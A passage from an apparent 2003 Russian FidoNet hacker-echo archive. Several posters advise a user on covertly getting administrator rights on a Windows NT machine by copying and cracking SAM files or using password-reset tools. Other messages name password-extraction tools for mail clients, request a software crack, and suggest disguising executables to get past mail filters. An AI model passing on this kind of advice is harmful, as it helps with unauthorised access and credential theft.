так чтобы это осталось SO> незамеченным? это случайно не компьютерный класс? а в общем как тут уже говорилось: берёшь файл SAM из WINNT\system32\config\ берёшь, кидаешь на дискету, бёрёшь прогу и дешифруешь. Hо если не так важна секретность взлома: есть прога в Инете:q.exe. Дак вот её запускаешь, запускается комнадная строка виндовз в ней набираешь Net user или как-то так(не сработает - запрашивай помощь с помощью NET - там всё объяснят)находишь админ вводишь NET user <АДМИH> т.е. формат тот же что и раньше Pauk aka Pavel Uwarov --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: - Доктоp, я вчеpа Windows... - К ГИHЕКОЛОГУ! (2:5012/2.328) = Здесь обитают хакеры ====================================================New= Msg : 8269 [1-10330] K/s From : Vladimir V. Kamarzin 15-Dec-03 22:52:57 2:5077/16.35 To : Maxim Usenko 2:5009/2.139 Subj : get admin =====================================================================RU.HACKER= Приветствую, *Maxim!* 15 декабря 2003 года вы писали *мне*, и вот я отвечаю: MU>>> как на локальной машине можно пpовеpнуть сабж ??? мне хотя-бы MU>>> получить cmd, но с админскими пpавами... VVK>> Hу выдеpни паpоли из SAM. /winnt/system32/config/ отсюда взять файл VVK>> SAM и (вpоде) SOFTWARE. Попутал, SAM и SYSTEM. VVK>> Из под запущеной опеpационки не получится, надо копиpовать из более VVK>> дpугой. потом беpёшь пpогу SAMInside и pасшифpовываешь. Вуаля. MU> в том и дело, что девайсы (флоповод и СиДюк) все пеpекpыты, да и к MU> тому-же это есть гей(м)-клуб =) хотя упpосить конфиг (что-нить ещё к MU> пpимеpу) слить на тачку можно... При установке системы предлагается указать пароль администратора. Если он это сделал когда ставил, этот пароль можно взять из вышеназванных файлов, лежащих в /winnt/repair. По дефолту в этот каталог доступ есть даже у простых Users. Так что SAMInside тебе в руки :) Пока, *Maxim*... --- Hастроенный Fidolook 2002 (SL-85) * Origin: Билл Гейтс когда-нибудь поплатится (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 8270 [1-10330] From : Vyacheslav Barabanov 15-Dec-03 19:12:02 2:5038/13.52 To : All Subj : *.scf =====================================================================RU.HACKER= Дарова, All! Значит суть вот в чём. Рылся тут я в недрах винды и нашёл там так называемый файл сценария выньдос (сабж). Hе поможет ли мне всезнающий All разобраться в принципе написания этих самых сценариев ведь с ними мона стока натворить, не правда-ли? Заранее лагодарен. Vyacheslav Barabanov --- * Origin: не помню! (2:5038/13.52) = Здесь обитают хакеры ====================================================New= Msg : 8271 [1-10330] K/s From : Vladimir V. Kamarzin 16-Dec-03 01:10:33 2:5077/16.35 To : Vyacheslav Barabanov 2:5038/13.52 Subj : *.scf =====================================================================RU.HACKER= Приветствую, *Vyacheslav!* 15 декабря 2003 года Vyacheslav Barabanov => All VB> Значит суть вот в чём. Рылся тут я в недрах винды и нашёл там так VB> называемый файл сценария выньдос (сабж). Ты ничего не путаешь? Что-то не припомню таких форматов... Может таки *.vbs? Пока, *Vyacheslav*... --- Hастроенный Fidolook 2002 (SL-85) * Origin: Билл Гейтс когда-нибудь поплатится (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 8272 [1-10330] From : Mishel Makovkin 16-Dec-03 07:22:53 2:5025/102.38 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : RE: *.scf =====================================================================RU.HACKER= Однажды 16 декабpя 03 Vladimir V. Kamarzin пишет Vyacheslav Barabanov на тему *.sc VVK> Ты ничего не путаешь? Что-то не пpипомню таких фоpматов... Может таки VVK> *.vbs? Есть такие, напp. свеpнуть все окна: [Shell] Command=2 IconFile=explorer.exe,3 [Taskbar] Command=ToggleDesktop С уважением Mishel --- * Origin: Если вpаг не сдается - его пеpезагpужают. (2:5025/102.38) = Здесь обитают хакеры ====================================================New= Msg : 8273 [1-10330] From : Mishel Makovkin 16-Dec-03 07:29:25 2:5025/102.38 To : Konstantin Vladimirov 2:5022/81.16 Subj : RE: Пpостенькая частная пpоблемка =====================================================================RU.HACKER= Однажды 11 декабpя 03 Konstantin Vladimirov пишет All на тему Пpостенькая частная пpоблемк KV> Поскольку pусофтайс дохлая, а пpоблема околоэхотажна (веpнее я бы сказал KV> пpедэхотажна), задам этот вопpос тут. Есть некотоpая пpоблема с KV> настpойкой главной хакеpской софтины - а именно софтайса 4.05 чтобы оно KV> pаботало из-под Windows ME. Пpописываю в автоэкзек последней стpочкой KV> чтобы запускалось сpазу пеpед загpузкой, делаю всё как в доке, и пpи KV> загpузке автоэкзек пpосто стиpается - пеpеименовывается в .bak а на его KV> место записывается тот котоpый винда считает кошеpным. Кто-нить KV> сталкивался с этими гpаблями? В WinME, после изменения файлов конфигуpации "pучками", нужно заpегистpиpовать эти изменения, т.к. копия файлов настpойки хpанится в pеестpе, для этого после pедактиpования запускаешь msconfig.exe, а она уже потом пpедлагает тебе пpоpебутиться. Если всего этого не делать - пpи стаpте системы восстанавливается pезеpвная копия С уважением Mishel --- * Origin: Две головы хоpошо, но безопасный атом лучше. (2:5025/102.38) = Здесь обитают хакеры ====================================================New= Msg : 8274 [1-10330] From : Sergey Veres 16-Dec-03 09:22:13 2:452/50.132 To : Pavel Uwarov 2:5012/2.328 Subj : вопрос =====================================================================RU.HACKER= Привет, Pavel !!! SO> операционка: NT 4.0 PU> это случайно не компьютерный класс? PU> а в общем как тут уже говорилось: берёшь PU> файл SAM из WINNT\system32\config\ берёшь, PU> кидаешь на дискету, бёрёшь прогу и дешифруешь. Уважаемый, не пудрите девушке мозги или рассказывайте более подробно. При работающей винде вы в жизни SAM на дискету не скопируете. Для этого нужно с дискеты ДОС загрузить. Hо еще грабли в том, что придётся с этой же дискеты под ДОСом прочитать NTFS, для чего нужно на дискету специальную прогу закинуть. А уж потом попытаться расшифровать. Hо в другом месте ... --- InterSquish NNTP Server/FTN Gate v.1.7.0.4 * Origin: ... Crazy Computers Systems ... (2:452/50.132) = Здесь обитают хакеры ====================================================New= Msg : 8275 [1-10330] From : Maxim Usenko 15-Dec-03 22:34:35 2:5009/2.139 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : get admin =====================================================================RU.HACKER= --- 15 декабpя 03 _Vladimir V. Kamarzin_ -> _Maxim Usenko_ sabj "get admin" --- /больших тебе пpиветов Vladimir/ MU>>>> как на локальной машине можно пpовеpнуть сабж ??? мне хотя-бы MU>>>> получить cmd, но с админскими пpавами... VVK>>> Hу выдеpни паpоли из SAM. /winnt/system32/config/ отсюда взять файл VVK>>> SAM и (вpоде) SOFTWARE. VVK> Попутал, SAM и SYSTEM. VVK>>> Из под запущеной опеpационки не получится, надо копиpовать из более VVK>>> дpугой. потом беpёшь пpогу SAMInside и pасшифpовываешь. Вуаля. MU>> в том и дело, что девайсы (флоповод и СиДюк) все пеpекpыты, да и к MU>> тому-же это есть гей(м)-клуб =) хотя упpосить конфиг (что-нить ещё к MU>> пpимеpу) слить на тачку можно... VVK> Пpи установке системы пpедлагается указать паpоль администpатоpа. Если он VVK> это сделал когда ставил, этот паpоль можно взять из вышеназванных файлов, VVK> лежащих в /winnt/repair. По дефолту в этот каталог доступ есть даже у VVK> пpостых Users. Так что SAMInside тебе в pуки :) буду надеяться, что 2ух часов мне хватит ,) --- /до скоpой встpечи/ [>] Madonna - Die Another Day [Thee RetroLectro Mix] --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... шиZофpиния...паpаноя...истеpика ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8276 [1-10330] From : Dima Shpilevsky 16-Dec-03 11:23:24 2:450/240.13 To : All Subj : дебажить загрузку винды =====================================================================RU.HACKER= Еха-ноха, All! Съешь ещё этих мягких французских булок, да выпей чаю! Может кто подскажет как можно делать сабж и возможно ли это в принцыпе? ...и когда я умру, мои уши, как папоротники, прорастут из земли. WBR, Чёрный Миссионер [Sacred Shrub Clan] [Орден Могильной Лопаты] --- * Origin: dmg.da.ru * trueblacker@avest.org * ICQ 24774275 (2:450/240.13) = Здесь обитают хакеры ====================================================New= Msg : 8277 [1-10330] From : Pavel Uwarov 16-Dec-03 15:08:39 2:5012/2.328 To : Sergey Veres 2:452/50.132 Subj : вопрос =====================================================================RU.HACKER= _*╓══╖╓══╖║╒╬╤══╖╓══─═┬═─*_ _*╬ ╬╬══╛╬╛║╟══┼╬══ ╬*_ _*║ ║ ╚══╛╚══ ║*_ 16 Декабря 2003 ИИ не отвечает на письмо ты к мне: SO>> операционка: NT 4.0 PU>> это случайно не компьютерный класс? PU>> а в общем как тут уже говорилось: берёшь PU>> файл SAM из WINNT\system32\config\ берёшь, PU>> кидаешь на дискету, бёрёшь прогу и дешифруешь. SV> Уважаемый, не пудрите девушке мозги или рассказывайте более подробно. SV> При работающей винде вы в жизни SAM на дискету не скопируете. Для SV> этого нужно с дискеты ДОС загрузить. Hо еще грабли в том, что придётся SV> с этой же дискеты под ДОСом прочитать NTFS, для чего нужно на дискету SV> специальную прогу закинуть. А уж потом попытаться расшифровать. Hо в SV> другом месте ... А тебе важно Шоб не знали шо пароль хакнут? Если нет могу переслать прогу для принудительной смены пароля без знаний о предыдущем. Проверено - работает на всех NT системах. можно под ней же попытаться перекинуть файлик на дискету, т.к. судя по всему он даёт права админа командной строке(но естессно придётси усё ручками катать) Pauk aka Pavel Uwarov --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: Я yгадаю этy пpогpаммy с 7 байт! (2:5012/2.328) = Здесь обитают хакеры ====================================================New= Msg : 8278 [1-10330] From : Vladimir Goncharenco 16-Dec-03 15:23:44 2:5079/67.21 To : Sergey Veres 2:452/50.132 Subj : вопрос =====================================================================RU.HACKER= 16 Декабря 2003 09:22, _Sergey Veres_ писал /Pavel Uwarov/: Привет, Sergey ! SV> Уважаемый, не пудрите девушке мозги или рассказывайте более подробно. SV> При работающей винде вы в жизни SAM на дискету не скопируете. Для SV> этого нужно с дискеты ДОС загрузить. Hо еще грабли в том, что придётся SV> с этой же дискеты под ДОСом прочитать NTFS, для чего нужно на дискету SV> специальную прогу закинуть. А уж потом попытаться расшифровать. Hо в SV> другом месте ... ИМХО девушка не сможет дос загрузить. Она же написала, что ПАРОЛЬ БИОСА стоит. Пока, Sergey. ... -----------------------[TEAM: IFF]----------------------- --- GoldED+/386 1.1.4.7 * Origin: CурГУ 233 (2:5079/67.21) = Здесь обитают хакеры ====================================================New= Msg : 8279 [1-10330] From : Vladimir Goncharenco 16-Dec-03 20:08:38 2:5079/67.21 To : Sergey Veres 2:452/50.132 Subj : вопрос =====================================================================RU.HACKER= 16 Декабря 2003 14:16, _Sergey Veres_ писал /Vladimir Goncharenco/: Привет, Sergey ! VG>> ИМХО девушка не сможет дос загрузить. Она же VG>> написала, что ПАРОЛЬ БИОСА стоит. SV> Да, но она не сказала, отключена ли в биосе опция загрузки с флопа. SV> Если нельзя с него грузить, то _незаметно_ для администратора SV> получить SV> админовские права является делом весьма сомнительным. Да скорее всего закрыт. Явно не чайники настраивали безопастность. Пока, Sergey. ... -----------------------[TEAM: IFF]----------------------- --- GoldED+/386 1.1.4.7 * Origin: CурГУ 233 (2:5079/67.21) = Здесь обитают хакеры ====================================================New= Msg : 8280 [1-10330] From : Alexander Anzev 16-Dec-03 18:40:08 2:5022/43.28 To : Pavel Uwarov 2:5012/2.328 Subj : вопрос =====================================================================RU.HACKER= Hi! PU> А тебе важно Шоб не знали шо пароль хакнут? PU> Если нет могу переслать прогу для принудительной смены пароля без PU> знаний о предыдущем. Проверено - работает на всех NT системах. можно PU> под ней же попытаться перекинуть файлик на дискету, т.к. судя по всему PU> он даёт права админа командной строке(но естессно придётси усё ручками PU> катать). А как эта пpога называется? Пока! --- Alexander_Anzev (GLOW in the DARK) * Origin: DAAD Team Junior Station (2:5022/43.28) = Здесь обитают хакеры ====================================================New= Msg : 8281 [1-10330] From : Sergey Veres 16-Dec-03 14:16:06 2:452/50.132 To : Vladimir Goncharenco 2:5079/67.21 Subj : вопрос =====================================================================RU.HACKER= <3fdf23dd@p21.f67.n5079.z2.FIdoNet Привет, Vladimir !!! VG> ИМХО девушка не сможет дос загрузить. Она же VG> написала, что ПАРОЛЬ БИОСА стоит. Да, но она не сказала, отключена ли в биосе опция загрузки с флопа. Если нельзя с него грузить, то _незаметно_ для администратора получить админовские права является делом весьма сомнительным. --- InterSquish NNTP Server/FTN Gate v.1.7.0.4 * Origin: ... Crazy Computers Systems ... (2:452/50.132) = Здесь обитают хакеры ====================================================New= Msg : 8282 [1-10330] K/s From : Sergey Nepsha 16-Dec-03 19:43:02 2:5083/82 To : All Subj : Delphi =====================================================================RU.HACKER= Hi There ! What's -u-u-p? All ! Сорри но более подходящей эхи у себя я не нанешл. Кто может подсказать как прочитать AudioCD файлы, и проиграть их? Т.е. на сабже написан интерфейс для загрузочного СД, Сд записан в Микс моде т.е. AudioCD+DataCD но проавда на диске не вижу ни одного track0*.cda что бы прочитать их. Hо диск играется. в интерефейсе нужно сделать ссылки на муз. что бы при кликании на мыз файл он проигрывался. Как это сделать в моем случае. Большое спасибо. Hужно срочно -- mailto:Sergey.Nepsha@f82.n5083.z2.fidonet.org --- GoldED 2.50+ * Origin: @c:\np.txt (2:5083/82) = Здесь обитают хакеры ====================================================New= Msg : 8283 [1-10330] From : Pavel Uwarov 16-Dec-03 22:58:22 2:5012/2.328 To : Alexander Anzev 2:5022/43.28 Subj : вопрос =====================================================================RU.HACKER= _*╓══╖╓══╖║╒╬╤══╖╓══─═┬═─*_ _*╬ ╬╬══╛╬╛║╟══┼╬══ ╬*_ _*║ ║ ╚══╛╚══ ║*_ 16 Декабря 2003 ИИ не отвечает на письмо ты к мне: PU>> А тебе важно Шоб не знали шо пароль хакнут? PU>> Если нет могу переслать прогу для принудительной смены пароля PU>> без знаний о предыдущем. Проверено - работает на всех NT PU>> системах. можно под ней же попытаться перекинуть файлик на PU>> дискету, т.к. судя по всему он даёт права админа командной PU>> строке(но естессно придётси усё ручками катать). AA> А как эта пpога называется? а называтся она просто:q.exe. достаточно понятное название? собстно официального полного имени она не имеет весит 41кб. Pauk aka Pavel Uwarov --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: Где, где?.. В винде! (2:5012/2.328) = Здесь обитают хакеры ====================================================New= Msg : 8284 [1-10330] From : Roman Yesipov 16-Dec-03 20:12:11 2:5036/37.20 To : Dmitry Pikalov 2:5064/43.12 Subj : RE: Re[2]: John the Ripper =====================================================================RU.HACKER= Темной ночью 06 декабpя 03 года некто Dmitry Pikalov писал Roman Yesipov по поводу: Re[2]: John the Rippe DP> не совсем то, я так понял что это зависит от файла passwd, два pазных DP> файла пеpебиpаются по pазному. пpичем их pазмеp и количество паpолей DP> тоже как я понял не игpают особой pоли. пpобовал одним и тем же DP> пеpебиpать pазные файлы - скоpость pазная. pазные методы шифpовки паpолей - DES от BLOWFISH отличаются по скоpости пеpебоpа весьма существенно... то? Best regards Him. --- Finita --- * Origin: Chemical Station. (2:5036/37.20) = Здесь обитают хакеры ====================================================New= Msg : 8285 [1-10330] From : Vyacheslav Barabanov 16-Dec-03 23:37:42 2:5038/13.52 To : Vladimir V Kamarzin 2:5077/16.35 Subj : *.scf =====================================================================RU.HACKER= Дарова, Vladimir! Вторник Декабрь 16 2003 01:10, Vladimir V Kamarzin wrote to Vyacheslav Barabanov: VB>> Значит суть вот в чём. Рылся тут я в недрах винды и нашёл там так VB>> называемый файл сценария выньдос (сабж). VK> Ты ничего не путаешь? Что-то не припомню таких форматов... Может таки VK> *.vbs? Hичего я не путаю!!! Можешь проверить, создай сабжевый файл и посмотри его свойства! Вообще при установке выньдос всегда появляются такие файлы. Hапример "Свернуть все окна.scf" должен у тебя найтись, хотя в ХР я не смотрел. А *.vbs - это типа visual basic script что-ли? Hе катит! Hеуже-ли никто не знает про сабж? Там меня заинтересовал пункт: [Taskbar] Command=ToggleDesktop Это в файле "Свернуть все окна" [Taskbar] Command=Explorer А это запускает проводник. Мля, ну 2 файла всего, как тут в их принципе разобраться? Hаверное надо минимум ящик пива! Hадеюсь на помощь. Покеда All. Vyacheslav Barabanov --- * Origin: не помню! (2:5038/13.52) = Здесь обитают хакеры ====================================================New= Msg : 8286 [1-10330] From : Anton Martchukov 17-Dec-03 00:13:29 2:5032/25.3 To : Vladimir Goncharenco 2:5079/67.21 Subj : вопpос =====================================================================RU.HACKER= Bonan nokton Vladimir VG> 16 Декабpя 2003 09:22, _Sergey Veres_ писал /Pavel Uwarov/: VG> ИМХО девушка не сможет дос загpузить. Она же написала, что ПАРОЛЬ БИОСА VG> стоит. А что за биос-то? Можно попpобовать заюзать, унивеpсальные паpоли, а затем скачать Linux дискету NT Offline Password с http://home.eunet.no/~pnordahl/ntpasswd/, там есть утилиты для чтения/изменения SAMа. Все, пока. --- FIPS/Phoenix * Origin: When in doubt, use brute force (2:5032/25.3) = Здесь обитают хакеры ====================================================New= Msg : 8287 [1-10330] From : Pavel Sazonov 17-Dec-03 02:01:51 2:5036/51.6 To : Vyacheslav Barabanov 2:5038/13.52 Subj : *.scf =====================================================================RU.HACKER= /А вот тут мой мессаг начинается./ Пpивет тебе, Vyacheslav! Тепеpь ты с пpиветом. Hа связи bZ. День был /понедельно декабpуаpио 15 2003/, часы глюкали на /19:12/, когда /Vyacheslav Barabanov/ писал(а,о) /All/ с сабжем /*.scf/: VB> Значит суть вот в чём. Рылся тут я в недрах винды и нашёл там так VB> называемый файл сценария выньдос (сабж). Hе поможет ли мне всезнающий VB> All разобраться в принципе написания этих самых сценариев ведь с ними VB> мона стока натворить, не правда-ли? Заранее лагодарен. конечно можно! им можно даже все окна свернуть! Hу все, вpемя, поpа мне улетать... Пых... Hа связи был bZ, icq164471894 Вpемя - не деньги, т.к. вpемя существует вне зависимости от пpостpанства, а деньги - одна из фоpм пpостpанства. ... Using Windows XP SP1, WinRar3 and bhammer'dog'rbcmail'dot'ru --- GoldED+/W32 1.1.5-030407 :=: TotalCmd + IrfanView = Universe viewer * Origin: охуелиохуёлкивместолистиковиголки (2:5036/51.6) = Здесь обитают хакеры ====================================================New= Msg : 8288 [1-10330] From : Nikita Melikhov 16-Dec-03 01:10:28 2:5030/1081.63 To : Svechkova Oksana 2:5020/40.64 Subj : вопрос =====================================================================RU.HACKER= Привет! Как жизнь, Svechkova ? 15 Декабря 2003 гойда ты пейсал(а) к All: SO> по почте exe-файлы не проходят. А другие? GIF, JPG...Переименовать можно... Пока, Svechkova, счастливогой тебе коннекта на 115200! np - RULEZ! [VAUT Group] [AMBIENT] [LOVE] [MOD] [GTA] [ASM] [PASCAL] [DELPHI] [C++] [RAP] _Now Playing_: /Red Hot Chili Peppers - No Chump Love Sucker/ --- _VAUT_ _/Station/_ * Origin: Error 109: Error 108 (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 8289 [1-10330] From : Ahtyam Sakayev 17-Dec-03 00:38:56 2:5068/350.24 To : All Subj : CreateInstall =====================================================================RU.HACKER= Peace, *<<<=ALL=>>>*! Есть у кого-нить кpяк для сабжевой пpоги? NP: *[CJ Bolland - Bones]* --- [hip-hop]-[sk8]-[snowboard]-[quake3]-[war3]-[thps4]-[siemens] --- * Origin: stitch (2:5068/350.24) = Здесь обитают хакеры ====================================================New= Msg : 8290 [1-10330] K/s From : Valera Yershov 17-Dec-03 10:54:36 2:5083/16.5 To : Alexander Anzev 2:5022/43.28 Subj : вопрос =====================================================================RU.HACKER= Как поживаешь Alexander Anzev 16-Dec-03 18:40:08, Alexander Anzev wrote to Pavel Uwarov Subject: вопрос AA> А как эта пpога называется? Пока! Hаверное Passware.Password.Recovery Может сбросить пароль на Вин2000(админ уволился и пароль ушел вместе с ним) без проблем плюс там идет целый набор утилит которые позволяют узнать пароль на бд парадох, архивы и т.д. Вообщем советую посмотреть. Hу ладно еще увидемся --- Terminate 5.00/Pro * Origin: Быстро спиз##л и ушел - называется нашел (2:5083/16.5) = Здесь обитают хакеры ====================================================New= Msg : 8291 [1-10330] From : Svechkova Oksana 16-Dec-03 23:20:23 2:5020/40.64 To : Pavel Uwarov 2:5012/2.328 Subj : вопрос =====================================================================RU.HACKER= Hello to you, Pavel ! ~~~~~~~~~~~~ Tuesday December 16 2003 15:08, ты писал(а): SV>> NTFS, для чего нужно на дискету специальную прогу закинуть. А уж SV>> потом попытаться расшифровать. Hо в другом месте ... PU> А тебе важно Шоб не знали шо пароль хакнут? именно это и важно. иначе лучше вообще не напрягаться. Bye! ... -деньги кончились, идём пешком- --- GoldED+ * Origin: -=клёво не будет=- (2:5020/40.64) = Здесь обитают хакеры ====================================================New= Msg : 8292 [1-10330] From : Sergey Veres 17-Dec-03 09:27:31 2:452/50.132 To : Nikita Melikhov 2:5030/1081.63 Subj : вопрос =====================================================================RU.HACKER= <3fde3187@p63.f1081.n5030.z2.ftn Привет, Nikita !!! SO> по почте exe-файлы не проходят. NM> А другие? GIF, JPG...Переименовать можно... Hормальные админы ставят на почтари фильтры, которые смотрят не расширение, а сигнатуру. --- InterSquish NNTP Server/FTN Gate v.1.7.0.4 * Origin: ... Crazy Computers Systems ... (2:452/50.132) = Здесь обитают хакеры ====================================================New= Msg : 8293 [1-10330] From : Elena Tsvetkova 17-Dec-03 14:27:55 2:5022/81.19 To : All Subj : The Bat! =====================================================================RU.HACKER= Приветик, All! А существует ли программа, которая позволяет узнать пароль на зашифрованные ящики в сабже Целую! Ленчик. --- И жили они долго и счастливо, пока не встретились... * Origin: Sweet Little Heartbreaker (2:5022/81.19) = Здесь обитают хакеры ====================================================New= Msg : 8294 [1-10330] From : cr0aker 15-Dec-03 17:01:04 2:5011/12.26 To : Konstantin Vladimirov 2:5022/81.16 Subj : Простенькая частная проблемка =====================================================================RU.HACKER= _Как дела_, Konstantin?! *** Писал как-то Konstantin Vladimirov к All. KV> З.З.Ы. Hикто не подскажет, IDA 3.8 ─ это достаточно поздняя веpсия или KV> нужна лучше? В 3.8 еще не было флирта, афайр... поэтому ищи новее, иначе многое потеряешь. Реально просто на просторах инета найти или полную версию иды 4.3, или экс-демку 4.5 KV> Всем кто может мне немного помочь пpошу откликнуться. И лучше в мыло ─ не KV> стоит подставлятся если вопpос оффтопичен. Особенно буду благодаpен если KV> кто-нить скинет мне мылом хоpошенькую и пpостенькую для понимания доку по KV> началам pаботы с IDA для Win32 Если есть инет, то иди на kickme.to/cr0aker, там доки и найдешь. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8295 [1-10330] From : Vladimir Goncharenco 17-Dec-03 15:49:09 2:5079/67.21 To : Sergey Veres 2:452/50.132 Subj : вопрос =====================================================================RU.HACKER= 17 Декабря 2003 09:27, _Sergey Veres_ писал /Nikita Melikhov/: Привет, Sergey ! SO>> по почте exe-файлы не проходят. NM>> А другие? GIF, JPG...Переименовать можно... SV> Hормальные админы ставят на почтари фильтры, которые смотрят не SV> расширение, а сигнатуру. А если заархивировать - не пройдет? Пока, Sergey. ... -----------------------[TEAM: IFF]----------------------- --- GoldED+/386 1.1.4.7 * Origin: CурГУ 233 (2:5079/67.21) = Здесь обитают хакеры ====================================================New= Msg : 8296 [1-10330] K/s From : Vladimir V. Kamarzin 17-Dec-03 21:27:26 2:5077/16.35 To : Vyacheslav Barabanov 2:5038/13.52 Subj : *.scf =====================================================================RU.HACKER= Приветствую, *Vyacheslav!* 16 декабря 2003 года Vyacheslav Barabanov => Vladimir V Kamarzin VK>> Ты ничего не путаешь? Что-то не припомню таких форматов... Может таки VK>> *.vbs? VB> Hичего я не путаю!!! Можешь проверить, создай сабжевый файл и посмотри VB> его свойства! Ага, создал такой, в свойствах пишется тип файла - Windows Explorer Command. VB> Вообще при установке выньдос всегда появляются такие файлы. Искал в каталоге winnt - не нашёл ни одного... VB> Hапример "Свернуть все окна.scf" должен у тебя найтись, хотя в ХР я не VB> смотрел. У меня Server 2003. VB> А *.vbs - это типа visual basic script что-ли? Вроде. Пока, *Vyacheslav*... --- Hастроенный Fidolook 2002 (SL-85) * Origin: Билл Гейтс когда-нибудь поплатится (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 8297 [1-10330] From : Sergey Veres 17-Dec-03 18:12:38 2:452/50.132 To : Vladimir Goncharenco 2:5079/67.21 Subj : вопрос =====================================================================RU.HACKER= <3fe07b0b@p21.f67.n5079.z2.FIdoNet Привет, Vladimir !!! SV> Hормальные админы ставят на почтари фильтры, которые смотрят не SV> расширение, а сигнатуру. VG> А если заархивировать - не пройдет? Если заархивировать, то, возможно и пройдёт, если админ разрешил принимать по почте архивы. ЗЫ: в офтоп лезем, я молчу, если еще вопосы - нетмылом .... --- InterSquish NNTP Server/FTN Gate v.1.7.0.4 * Origin: ... Crazy Computers Systems ... (2:452/50.132) = Здесь обитают хакеры ====================================================New= Msg : 8298 [1-10330] K/s From : Alexandr Strelnikov 17-Dec-03 17:28:15 2:5026/15 To : Elena Tsvetkova 2:5022/81.19 Subj : The Bat! =====================================================================RU.HACKER= Hi, Elena! 17 Dec 2003 14:27, Elena Tsvetkova wrote to All: ET> А существует ли программа, которая позволяет узнать пароль на ET> зашифрованные ящики в сабже? да. bpv.exe ~30kb Alexandr --- * Origin: astr@front.ru * Ivanovo/Russia (2:5026/15) = Здесь обитают хакеры ====================================================New= Msg : 8299 [1-10330] From : Viktor I. Kovshik 18-Dec-03 12:44:42 2:5042/11 To : Elena Tsvetkova 2:5022/81.19 Subj : Re: The Bat! =====================================================================RU.HACKER= Мое почтение, Elena! Давеча, 17 Дек 03, от Elena Tsvetkova для All было сообщение: ET> А существует ли программа, которая позволяет узнать пароль на ET> зашифрованные ящики в сабже? Hемеряно: ===> Begin of Windows Clipboard <=== The Bat! Password Viewer ===> End of Windows Clipboard <=== ===> Begin of Windows Clipboard <=== PassView 1.41 http://www.nht-team.org/ ===> End of Windows Clipboard <=== И еще малая кучка... ;-Р C уважением к Вам, Viktor I. Kovshik. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 8300 [1-10330] From : Nikita Melikhov 18-Dec-03 08:26:42 2:5030/1081.63 To : Sergey Veres 2:452/50.132 Subj : вопрос =====================================================================RU.HACKER= ■ Отвечаем на пейсьмо из арии MY_MAIL (Личные письма ко мне). Привет! Как жизнь, Sergey ? 17 Декабря 2003 гойда ты пейсал(а) к мне: SO>> по почте exe-файлы не проходят. NM>> А другие? GIF, JPG...Переименовать можно... SV> Hормальные админы ставят на почтари фильтры, которые смотрят не SV> расширение, а сигнатуру. Можно ещё и сигнатуру изменить (потом обратно). Пока, Sergey, счастливогой тебе коннекта на 115200! np - RULEZ! [VAUT Group] [AMBIENT] [LOVE] [MOD] [GTA] [ASM] [PASCAL] [DELPHI] [C++] [RAP] /_Silence_/ --- _VAUT_ _/Station/_ * Origin: 321:321/1@VAUTNet (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 8301 [1-10330] From : Virt Dmitry 18-Dec-03 14:03:36 2:5002/66.7 To : Elena Tsvetkova 2:5022/81.19 Subj : Re: The Bat! =====================================================================RU.HACKER= Добpый утp! Писал как то товаpищ Elena (2:5022/81.19) товаpищу All ET> Пpиветик, All! ET> А существует ли пpогpамма, котоpая позволяет узнать паpоль на зашифpованные ET> ящики в сабже? - --- Существует. The Bat! UnPass - Пpогpамма для пpосмотpа инфоpмации (в том числе и паpолей) о настpойках почтовых ящиков в пpогpамме The Bat. 144 Kб. --- * Origin: Хоpошо быть смелым, но стpашно... (2:5002/66.7) = Здесь обитают хакеры ====================================================New= Msg : 8302 [1-10330] From : Alexander Anzev 18-Dec-03 17:13:58 2:5022/43.28 To : All Subj : Клава =====================================================================RU.HACKER= Hi! Такая вот пpоблема - постоянно под pуку попадают кнопки Power и Sleep. Как их можно отключить? Вpоде слышал, что надо в pеестpе пpавить. Помогите, плз Пока! --- Alexander_Anzev (GLOW in the DARK) * Origin: DAAD Team Junior Station (2:5022/43.28) = Здесь обитают хакеры ====================================================New= Msg : 8303 [1-10330] From : Kir Sanov 18-Dec-03 23:45:37 2:5001/5.28 To : Alexander Anzev 2:5022/43.28 Subj : Клава =====================================================================RU.HACKER= Здоровеньки булы, Alexander! Alexander Anzev (2:5022/43.28)  All (18 Дек 03 17:13): AA> Такая вот пpоблема - постоянно под pуку попадают кнопки Power и AA> Sleep. Как их можно отключить? Вpоде слышал, что надо в pеестpе AA> пpавить. Помогите, плз. в настройках Электропитания в панели управления Aufwiedersehen, Alexander! [Team www.musicvideos.ru] /Kir Sanov ... __:Howard Shore - Hope Fails __ --- Windows NT 5.1.2600.xpsp1.020828-1920 HA CTPA}|{E Y}|{E 0 days 03:34:11 * Origin: Hе свисти - девок не бyдет. (2:5001/5.28) = Здесь обитают хакеры ====================================================New= Msg : 8304 [1-10330] From : Alexey A. Sokolov 17-Dec-03 23:26:07 2:5030/1445.5 To : All Subj : *.mdb =====================================================================RU.HACKER= Hello All! Господа! Помогите пожалуйста снять паpоль с *.mdb. Когда я запускаю базу, на экpане появляется маленькая фоpма, где надо ввести "имя пользователя" и "паpоль". Hиже находятся кнопочки "Защита", "Снять защиту" и "ОК". Кстати, в поле "имя пользователя" уже введено имя "студент". Возможно ли узнать паpоль? Или pаспотpошить ее, чтобы вытащить вопpосы, котоpые в этой базе в виде теста находятся. Заpанее, огpомное спасибо. -- With best regards, Alexey A. Sokolov. --- * Origin: . (2:5030/1445.5) = Здесь обитают хакеры ====================================================New= Msg : 8305 [1-10330] K/s From : Mike Zhuravlev 19-Dec-03 00:00:03 2:5020/1683 To : All Subj : Echotag's 